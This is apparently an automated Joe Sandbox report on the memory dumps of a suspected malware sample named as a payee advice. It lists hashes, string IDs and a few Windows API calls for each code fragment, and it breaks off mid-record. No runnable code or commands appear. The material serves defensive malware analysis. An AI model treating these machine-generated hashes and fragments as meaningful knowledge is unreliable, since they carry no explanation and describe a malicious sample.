                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 8bq$TJbq
                                                                                                                                          • API String ID: 0-3440557903
                                                                                                                                          • Opcode ID: dac6204bf213f666cc1eb4938dae9502e8f5db0259e76635266f377893361acc
                                                                                                                                          • Instruction ID: d8f3bb5b47ccecfe606c9dd4a609f53fa751888d38680aab454a5d00a854c253
                                                                                                                                          • Opcode Fuzzy Hash: dac6204bf213f666cc1eb4938dae9502e8f5db0259e76635266f377893361acc
                                                                                                                                          • Instruction Fuzzy Hash: 83313675B001098FCB41EBA8C490E9DBBB2FF88324F255955E505AF362DB31EC85CB90
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 4']q$4']q
                                                                                                                                          • API String ID: 0-3120983240
                                                                                                                                          • Opcode ID: e834f891d311cb8fd4c7de6376d00b7ef8356b97c5b637f94101ae2cebff0fff
                                                                                                                                          • Instruction ID: d63fcf2c06579c95479db758b677452ec1ef9b8fb6d29a6e6308f1ccc3ddd8c7
                                                                                                                                          • Opcode Fuzzy Hash: e834f891d311cb8fd4c7de6376d00b7ef8356b97c5b637f94101ae2cebff0fff
                                                                                                                                          • Instruction Fuzzy Hash: 8FF044353002156FDB195AAADC5497ABADFEBC83A0B148429B949C7351DE71CD1183A1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LR]q
                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                          • Opcode ID: a5d5e19974fec895b5b96b3e75b9ead9dfd312172ead874996980988e990c68e
                                                                                                                                          • Instruction ID: 5586c49009c7e1b81c04ba5e78e49c5c9554209be89e7f87bbf988e8bbc91c44
                                                                                                                                          • Opcode Fuzzy Hash: a5d5e19974fec895b5b96b3e75b9ead9dfd312172ead874996980988e990c68e
                                                                                                                                          • Instruction Fuzzy Hash: FD52C874A00619CFCB64DF74DD94A9DBBB2FB99301F2055A9E409A7760DB306E86CF80
                                                                                                                                          APIs
                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B0066C2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3354001075.000000003B000000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B000000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3b000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateWindow
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                          • Opcode ID: 32b4e7a19f9bdfea0b27618e6df7a34a07bf68830d4e90569312b486c7e37273
                                                                                                                                          • Instruction ID: 38a8fd44c8136c904749cad5a85092ae81c86ca063beea777e9498ae4c34be4b
                                                                                                                                          • Opcode Fuzzy Hash: 32b4e7a19f9bdfea0b27618e6df7a34a07bf68830d4e90569312b486c7e37273
                                                                                                                                          • Instruction Fuzzy Hash: D451E3B1D00349DFDB14CF99C984ADEBFB2BF48310F64816AE819AB210DB759845CF90
                                                                                                                                          APIs
                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B0066C2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3354001075.000000003B000000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B000000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3b000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateWindow
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                          • Opcode ID: fe2780d67538b81621ff1ceee69a50818476c14ced6d0840c1c992d5b49b3ad4
                                                                                                                                          • Instruction ID: c9bcaad1599f637fbfb5cff8f656644f8b7132cac4e4d9e87895b0a368decc96
                                                                                                                                          • Opcode Fuzzy Hash: fe2780d67538b81621ff1ceee69a50818476c14ced6d0840c1c992d5b49b3ad4
                                                                                                                                          • Instruction Fuzzy Hash: 9241C1B1D00349DFDB14CF99C984ADEBFB6BF48310F64816AE819AB210DB75A845CF91
                                                                                                                                          APIs
                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 3B008DB1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3354001075.000000003B000000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B000000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3b000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CallProcWindow
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2714655100-0
                                                                                                                                          • Opcode ID: a178355fd02e8099da86d50b930d4b0ac5e27d5fe8e584f514327b5f1da9d4cf
                                                                                                                                          • Instruction ID: 7c9bc5886d4ec2922484b65026a7987cfb0d84931e4bb300325f50ccb00665ae
                                                                                                                                          • Opcode Fuzzy Hash: a178355fd02e8099da86d50b930d4b0ac5e27d5fe8e584f514327b5f1da9d4cf
                                                                                                                                          • Instruction Fuzzy Hash: 694149B9900305DFDB14CF99C488A9ABBF5FF88310F24C59AE519A7321DB34A841CFA1
                                                                                                                                          APIs
                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3A99B707
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353733702.000000003A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A990000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a990000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                          • Opcode ID: 9ece54a8e01e62cffcf0e8d888c50807c5d9c0966725940d4d0548f526f89922
                                                                                                                                          • Instruction ID: aa06fd0f992f4859765fe148ee4cbad7f92883cb4e0dbeedd86777f348c5b170
                                                                                                                                          • Opcode Fuzzy Hash: 9ece54a8e01e62cffcf0e8d888c50807c5d9c0966725940d4d0548f526f89922
                                                                                                                                          • Instruction Fuzzy Hash: 3F2103B5D00249AFDB10CFAAD584AEEBFF5EB48310F24805AE858A3310D378A951CF61
                                                                                                                                          APIs
                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3A99B707
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353733702.000000003A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A990000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a990000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                          • Opcode ID: 3c125c44792c77e2ef14277566812347c279413220cd13b71a481de6d3fe5cbd
                                                                                                                                          • Instruction ID: f0443753bca62ac717b2b32d6fef5db9ff6c6977eed84fe42cb65cc5f443b7b5
                                                                                                                                          • Opcode Fuzzy Hash: 3c125c44792c77e2ef14277566812347c279413220cd13b71a481de6d3fe5cbd
                                                                                                                                          • Instruction Fuzzy Hash: 3321C4B5D00249AFDB10CFAAD584ADEBFF8EB48310F14841AE919A3310D378A954CFA5
                                                                                                                                          APIs
                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 3B00B28D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3354001075.000000003B000000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B000000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3b000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Initialize
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                          • Opcode ID: 603d69ee75f0822b51a4f61a22544093e5ca8157bddd0cc1171d018654c60ba9
                                                                                                                                          • Instruction ID: db3fbbb84d2346ee199259362d088d8e8c855f4846aaed22deb66ae16e8a1f45
                                                                                                                                          • Opcode Fuzzy Hash: 603d69ee75f0822b51a4f61a22544093e5ca8157bddd0cc1171d018654c60ba9
                                                                                                                                          • Instruction Fuzzy Hash: D31142B1D003488FDB20DF9AD549B9EBBF4EB48320F20845AE519A7300C778A941CFA6
                                                                                                                                          APIs
                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 3B00B28D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3354001075.000000003B000000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B000000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3b000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Initialize
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                          • Opcode ID: 35cc92d917b274b2a98098fa8660396c52642fcff0bd77ee6899fc0cd4053406
                                                                                                                                          • Instruction ID: 9a5d46e7fd817f781f8a6ec7bfd4ff8f8ceea55702adae290cf6708baa24c72a
                                                                                                                                          • Opcode Fuzzy Hash: 35cc92d917b274b2a98098fa8660396c52642fcff0bd77ee6899fc0cd4053406
                                                                                                                                          • Instruction Fuzzy Hash: 691112B5C002498FDB20CFAAD585BDEBFF4AB48320F248459D459A3200C775A545CFA5
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PEY7
                                                                                                                                          • API String ID: 0-1339874439
                                                                                                                                          • Opcode ID: b9a78445b85f87d7e1b1f0286cc7fd569e39f3275fdc6199a5f96c0813d29a9d
                                                                                                                                          • Instruction ID: 6a27a44574d9bbe0e0e6d12531da213587c53b63a7b780b128bdb8f8b8443b31
                                                                                                                                          • Opcode Fuzzy Hash: b9a78445b85f87d7e1b1f0286cc7fd569e39f3275fdc6199a5f96c0813d29a9d
                                                                                                                                          • Instruction Fuzzy Hash: FB819074E412689FDB65DF69CD51BDDBBB2AF89300F1080EAD848A7251EB315E81CF40
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Haq
                                                                                                                                          • API String ID: 0-725504367
                                                                                                                                          • Opcode ID: eb34582da841d21c19a7fad0eb24fb170860834ba69473ab90fa50f22401a209
                                                                                                                                          • Instruction ID: 4ad68d3e72e9647f1d4970aec623a717578b0fc99a29f6b04285de9fd4d5bab0
                                                                                                                                          • Opcode Fuzzy Hash: eb34582da841d21c19a7fad0eb24fb170860834ba69473ab90fa50f22401a209
                                                                                                                                          • Instruction Fuzzy Hash: 3731B531B042489FCB45EFB8D9599AE7BF6AFC9341B1040BEE509D7291EA318E02C791
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: |nP7
                                                                                                                                          • API String ID: 0-1088609865
                                                                                                                                          • Opcode ID: c6970480f78e20be2ed11e823026fe9b9b295b4e55d8f5b9e4463c4da4d12c2b
                                                                                                                                          • Instruction ID: 4cd0ce3785a08fb86c07cd391747c42356265dc4de1b377644adef80cb614217
                                                                                                                                          • Opcode Fuzzy Hash: c6970480f78e20be2ed11e823026fe9b9b295b4e55d8f5b9e4463c4da4d12c2b
                                                                                                                                          • Instruction Fuzzy Hash: A531753570825ABFDB15DB78EC8042FBBA2BF41244B0945A6E078CB651DB30DD42CF82
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: t
                                                                                                                                          • API String ID: 0-2238339752
                                                                                                                                          • Opcode ID: d8c44f11a7d3ee95477d6312e9c13b29239670dd7394d0164b67f62212a17966
                                                                                                                                          • Instruction ID: ededeb20534bf2f4a14cceaad19d20f9a9f272bb192497cf4a634e4a8aeb4709
                                                                                                                                          • Opcode Fuzzy Hash: d8c44f11a7d3ee95477d6312e9c13b29239670dd7394d0164b67f62212a17966
                                                                                                                                          • Instruction Fuzzy Hash: 9E310274E056088FDB08DFBAD8406EDBBB2BF89300F14D12AD419BB295DB349946CF55
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Haq
                                                                                                                                          • API String ID: 0-725504367
                                                                                                                                          • Opcode ID: d98a179e4c14f1b6243f64ef22da73cfad75bb61bc1ab458508e525cc77c5ede
                                                                                                                                          • Instruction ID: 2a2c49759e83ed2a92f780f7bb083f976f16e1da0dede4e5aef591c69d1413a1
                                                                                                                                          • Opcode Fuzzy Hash: d98a179e4c14f1b6243f64ef22da73cfad75bb61bc1ab458508e525cc77c5ede
                                                                                                                                          • Instruction Fuzzy Hash: 86310231708285AFCB05AF78C8149AD7FB6FFCA340F1580AAD5428B6A2DB318E55CB50
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: F
                                                                                                                                          • API String ID: 0-2730988801
                                                                                                                                          • Opcode ID: 17653c145a4f9731d49b2b1cffd2cbd6929586e7c64821f2f0a29dcba6cfe82c
                                                                                                                                          • Instruction ID: 34ea13f2fe8977cd47a1f4339f95791ffd494544388ae494efcbef91dfb3a155
                                                                                                                                          • Opcode Fuzzy Hash: 17653c145a4f9731d49b2b1cffd2cbd6929586e7c64821f2f0a29dcba6cfe82c
                                                                                                                                          • Instruction Fuzzy Hash: FA313874D052498FCB05DFB8D8046EDBFF4EF4A300F1551AAD444E7261EB341A95CBA2
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 3"7
                                                                                                                                          • API String ID: 0-3328401908
                                                                                                                                          • Opcode ID: a96cc22a4b589ff503b87c49e496749733d0e75a97462d6f8d91ad58403000bb
                                                                                                                                          • Instruction ID: f516c3ba1df41ed75b723e2943a89118659ec5a7f3f788835076a4f3f92e4c2a
                                                                                                                                          • Opcode Fuzzy Hash: a96cc22a4b589ff503b87c49e496749733d0e75a97462d6f8d91ad58403000bb
                                                                                                                                          • Instruction Fuzzy Hash: AF11E9357055118FC7195B2ADCA493EBBA2FFC97513194079E40ADB765CF31DC028B90
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $EY7PEY7
                                                                                                                                          • API String ID: 0-1479923497
                                                                                                                                          • Opcode ID: 7310dc2b6533e3c4d16ab4ea03222a3155f0ec144fcfe9d1f7432a89ca4bdf48
                                                                                                                                          • Instruction ID: 36af1092cc33f4909f9d30f78a620e6422b60b814d325be1b0d4eca4ad20df98
                                                                                                                                          • Opcode Fuzzy Hash: 7310dc2b6533e3c4d16ab4ea03222a3155f0ec144fcfe9d1f7432a89ca4bdf48
                                                                                                                                          • Instruction Fuzzy Hash: A42162B0D042099FDB05EFA9C84069EBFF2FB81300F10C5AAD0589B261E7749A168F81
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $EY7PEY7
                                                                                                                                          • API String ID: 0-1479923497
                                                                                                                                          • Opcode ID: 6301c810f25eff626d7e18068a932338357a2e202eaab175f9f7fbd77dcbe615
                                                                                                                                          • Instruction ID: 53f61f2422d06ec0c23a79ad292a2357a1486c1c60d24d9b41a9542f604a5a89
                                                                                                                                          • Opcode Fuzzy Hash: 6301c810f25eff626d7e18068a932338357a2e202eaab175f9f7fbd77dcbe615
                                                                                                                                          • Instruction Fuzzy Hash: C4111FB0D0010EDFDB44EFE9D94069EBBF2FB85304F10D5A9E058AB261EB745A568F81
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ab1fa8de9d1d8f20196b62549490feea9debdfb09569bbe5627c7b20cf7d4762
                                                                                                                                          • Instruction ID: f2e5963f49b8b3bf034fd642b078c7e7adaa245d979f3307fdfe8dce8c86ca6e
                                                                                                                                          • Opcode Fuzzy Hash: ab1fa8de9d1d8f20196b62549490feea9debdfb09569bbe5627c7b20cf7d4762
                                                                                                                                          • Instruction Fuzzy Hash: 9412A834421653DFE2402B60EEAC12E7BA1FB5F727710AD24F10FC1865AB7546DACB62
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 11704e21ed1fb187432d1545e4f5dc98ed576fb60b99211a7a64203db73c7dc8
                                                                                                                                          • Instruction ID: a87587241915ec657285970e9359571a4abe3808d84acaad5f2c1457147ff6d2
                                                                                                                                          • Opcode Fuzzy Hash: 11704e21ed1fb187432d1545e4f5dc98ed576fb60b99211a7a64203db73c7dc8
                                                                                                                                          • Instruction Fuzzy Hash: AF9148315046458FCB11CF6CCC808AABFF9EF85321B15C6A6D858D7352D331E866CBA1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9ebd8bd400046bf48eb6e7d029db2425fae2f4eac5262023b4326557f65d258d
                                                                                                                                          • Instruction ID: 6708d920f0c971fdc8f59c43941d784bcc623b5b857df2ec62fc50cfaf8e7108
                                                                                                                                          • Opcode Fuzzy Hash: 9ebd8bd400046bf48eb6e7d029db2425fae2f4eac5262023b4326557f65d258d
                                                                                                                                          • Instruction Fuzzy Hash: 54713A347006058FCB15DF68CCA4A6E7BE6AF9A340B1941A9E806DB371DF70DC51CB51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fd632a60bcf0feba6777631506a953e22dd8f47bb0c31717bf19a4525bac8ff7
                                                                                                                                          • Instruction ID: 09031d19136fc3bb6e74723068f26688cd94acd5fdf9038ddb274cb2302c9492
                                                                                                                                          • Opcode Fuzzy Hash: fd632a60bcf0feba6777631506a953e22dd8f47bb0c31717bf19a4525bac8ff7
                                                                                                                                          • Instruction Fuzzy Hash: 955114767046029FD7048A68DC59AABBBA9FBC9324B11852FE41AC7751E732E801CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8c1b6bcb14a575a7ba63a9cba0b619bc85100e72a3cdb34d8abd977a4d8daf7a
                                                                                                                                          • Instruction ID: d327c6ad2587ae7c0be9c7768b611e94e93b37e3821b7f1784e5361074c4c004
                                                                                                                                          • Opcode Fuzzy Hash: 8c1b6bcb14a575a7ba63a9cba0b619bc85100e72a3cdb34d8abd977a4d8daf7a
                                                                                                                                          • Instruction Fuzzy Hash: B671C074E01218DFDB14DFA5C990ADDBBB2BF89304F20912AD419BB355DB35A942CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 10db189e000dbf8717a2308e3c8c5c7f8ca5f35cf350583a07905f3930278ef3
                                                                                                                                          • Instruction ID: 6c328659348525f6065772400b6560bcbbcfae1a4dd9543041f42308774ff39e
                                                                                                                                          • Opcode Fuzzy Hash: 10db189e000dbf8717a2308e3c8c5c7f8ca5f35cf350583a07905f3930278ef3
                                                                                                                                          • Instruction Fuzzy Hash: 3171DF74E00218DFDB14DFA9C990ADDBBB2BF89300F24912AD419BB354DB359982CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a0a49fbe9b4b9b90b3850732fd002b3eb1e4c482631183b334c51436f13d01dc
                                                                                                                                          • Instruction ID: e4f2065c4512bb4b0a76b7c3c83b36dd8fda98ac972f233dc598ff6c2dc7a007
                                                                                                                                          • Opcode Fuzzy Hash: a0a49fbe9b4b9b90b3850732fd002b3eb1e4c482631183b334c51436f13d01dc
                                                                                                                                          • Instruction Fuzzy Hash: 0471A174E10218CFDB18DFA9C990ADDBBB2BF89300F24912AD419BB355EB359946CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0608b31b89a1145cdb66efe640ff678daad03e29b353a17f546a058e6ce43c88
                                                                                                                                          • Instruction ID: f9c50d3121c056511b0c3cb9511d84b35b18bd75473c787cd78d5633ac83222a
                                                                                                                                          • Opcode Fuzzy Hash: 0608b31b89a1145cdb66efe640ff678daad03e29b353a17f546a058e6ce43c88
                                                                                                                                          • Instruction Fuzzy Hash: 7871C174E10218CFDB14DFA9C991ADDBBB2BF89300F24912AD409BB355DB35A942CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3521fa9bd287ba0cb3a72a398a084c36af5369165101f609652f0568ca75501f
                                                                                                                                          • Instruction ID: 7e0711977cd4a9daf4ab1766aedb061561ba754cb9d0252560cf7f41f222f45e
                                                                                                                                          • Opcode Fuzzy Hash: 3521fa9bd287ba0cb3a72a398a084c36af5369165101f609652f0568ca75501f
                                                                                                                                          • Instruction Fuzzy Hash: B771BFB4E10218CFDB14DFA9C990ADDBBB2BF89300F24912AD419BB355DB35A946CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8763339a2850c981083cb2ffc7431e872e8f67aef8b200aad4d9e205b6ec9042
                                                                                                                                          • Instruction ID: 2d606df9bda588f0ef4cc248122cdd7db586a60f5c32206720caa6da1cd3d434
                                                                                                                                          • Opcode Fuzzy Hash: 8763339a2850c981083cb2ffc7431e872e8f67aef8b200aad4d9e205b6ec9042
                                                                                                                                          • Instruction Fuzzy Hash: 1B611174E11219DFDB14CFA5C844BADBBB2FF89304F208129E809AB355DB355A86CF41
                                                                                                                                          Memory Dump Source
